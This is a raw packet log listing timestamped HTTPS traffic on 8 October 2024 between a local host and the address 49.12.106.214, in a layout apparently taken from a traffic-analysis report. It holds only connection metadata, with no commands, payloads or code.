                                                                                                                Oct 8, 2024 05:00:01.691956997 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.692003012 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.692014933 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.692039013 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.692055941 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.699786901 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.699806929 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.699855089 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.699863911 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.699887991 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.699903965 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.710328102 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.710346937 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.710417986 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.710429907 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.710478067 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.745420933 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.745474100 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.745522976 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.745594978 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.745635986 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.745896101 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.747997999 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.748049021 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.748234034 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.748250008 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.748300076 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.748718023 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.748760939 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.748799086 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.748811007 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.748838902 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.748857975 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.749572992 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.749625921 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.749656916 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.749669075 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.749694109 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.749711037 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.768233061 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.768275023 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.768313885 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.768326998 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.768354893 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.768373966 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.784421921 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.784465075 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.784499884 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.784511089 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.784534931 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.784554005 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.792195082 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.792237997 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.792280912 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.792292118 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.792320013 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.792339087 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.802870035 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.802887917 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.802963972 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.802975893 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.803024054 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.838012934 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.838057041 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.838218927 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.838218927 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.838287115 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.838340998 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.840356112 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.840394974 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.840437889 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.840451002 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.840488911 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.840488911 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.042661905 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.042718887 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.042871952 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.042922020 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.042938948 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.042938948 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.042939901 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043008089 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.043062925 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043062925 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043086052 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.043126106 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.043143988 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043157101 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.043185949 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043185949 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043211937 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043277025 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.043319941 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.043339968 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043351889 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.043390036 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043390036 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043565989 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.043612003 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.043632030 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043642998 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.043669939 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043689966 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043761969 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.043807983 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.043828011 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043842077 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.043864012 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043864012 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043888092 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.043956995 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.043999910 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.044020891 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.044035912 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.044059038 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.044059038 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.044083118 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.044147968 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.044188976 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.044209003 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.044219017 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.044256926 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.044256926 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.044343948 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.044387102 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.044406891 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.044416904 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.044446945 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.044466972 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.044516087 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.044559002 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.044595003 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.044605017 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.044630051 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.044647932 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.044753075 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.044795036 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.044817924 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.044827938 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.044862986 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.044862986 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.044948101 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.044986963 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.045017004 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.045027018 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.045053005 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.045069933 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.045129061 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.045171022 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.045196056 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.045207024 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.045232058 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.045250893 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.045289040 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.045334101 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.045356989 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.045367002 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.045459986 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.045459986 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.045555115 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.045599937 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.045623064 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.045633078 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.045659065 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.045679092 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.045679092 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.050829887 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.050885916 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.050920010 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.050930023 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.050956011 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.050972939 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.051225901 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.051270962 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.051292896 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.051307917 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.051331043 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.051331043 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.051353931 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.051481009 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.051526070 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.051546097 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.051558018 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.051589012 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.051589966 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.052061081 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.052135944 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.052167892 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.052177906 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.052206993 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.052225113 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.061708927 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.061753035 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.061803102 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.061814070 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.061844110 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.061861992 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.069255114 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.069298983 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.069339991 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.069351912 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.069387913 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.069387913 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.080257893 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.080301046 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.080346107 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.080358982 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.080387115 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.080405951 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.312530994 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.312575102 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.312725067 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.312757969 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.312757969 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.312828064 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.312876940 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.312897921 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.313050032 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.313088894 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.313225985 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.313225985 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.313261986 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.313290119 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.313330889 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.313334942 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.313349009 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.313389063 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.313426018 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.313447952 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.313471079 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.313509941 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.313527107 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.313540936 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.313569069 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.313586950 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.313734055 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.313774109 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.313793898 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.313806057 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.313832998 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.313855886 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.313947916 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.313987017 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.314004898 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.314016104 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.314040899 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.314162016 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.314232111 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.314280033 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.314304113 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.314315081 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.314347982 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.314347982 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.314347982 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.314430952 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.314472914 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.314493895 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.314505100 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.314537048 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.314537048 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.314559937 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.314718962 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.314762115 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.314785004 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.314795971 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.314821005 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.314837933 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.314884901 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.314927101 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.314974070 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.314974070 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.314986944 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.315027952 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.315046072 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.315089941 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.315113068 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.315123081 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.315145969 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.315162897 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.315208912 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.315249920 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.315274000 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.315284014 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.315310955 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.315330982 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.315366983 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.315431118 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.315445900 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.315510035 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.315541983 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.315586090 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.315610886 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.315620899 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.315711021 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.315711021 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.318344116 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.318373919 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.318423033 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.318433046 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.318458080 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.318474054 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.318568945 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.318591118 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.318670034 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.318680048 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.318725109 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.318725109 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.318738937 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.318751097 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.318772078 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.318798065 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.318810940 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:02.318839073 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.318864107 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:02.318957090 CEST4434977549.12.106.214192.168.2.4
